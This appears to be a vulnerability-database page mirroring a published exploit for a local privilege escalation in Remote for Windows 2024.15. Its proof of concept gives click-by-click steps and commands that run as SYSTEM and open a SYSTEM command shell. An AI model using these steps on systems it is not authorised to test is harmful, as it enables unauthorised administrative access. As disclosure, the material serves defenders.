Lucene search
K

📄 Remote for Windows 2024.15 Local Privilege Escalation

🗓️ 21 May 2025 00:00:00Reported by Chokri HammediType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 70 Views

Local privilege escalation in Remote for Windows 2024.15 enables a SYSTEM shell by using action text execution.

Code
# Exploit Title: Remote for Windows 2024.15 - Local Privilege Escalation
    # Date: 2025-05-19
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://rs.ltd
    # Software Link: https://rs.ltd/latest.php?os=win
    # Version: 2024.15
    # Tested on: Windows 10/11 with Remote for Windows (helper)
    
    1. open Remote for windows
    2. go to actions tab
    3. click on "Add.." button
    4. in action text area put the following command:
    whoami > c:\pwned.txt
    
    5. click on run button
    6. viewing the content of c:\pwned.txt shows:
    
    nt authority\system
    
    the command runs as system.
    
    
    Alternative PoC: Spawning a SYSTEM Shell
    
    1. Repeat the same steps as above, but enter the following in the action
    text box:
       Start-Process cmd.exe
    2. Click “Run”.
    3. A new Command Prompt window will appear running as *NT AUTHORITY\SYSTEM*,
    providing a fully interactive SYSTEM-level shell.
    
    Microsoft Windows [Version 10.0.19045.5011]
    (c) Microsoft Corporation. All rights reserved.
    
    C:\Windows\system32>whoami
    nt authority\system
    
    C:\Windows\system32>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 May 2025 00:00Current
7.6High risk
Vulners AI Score7.6
70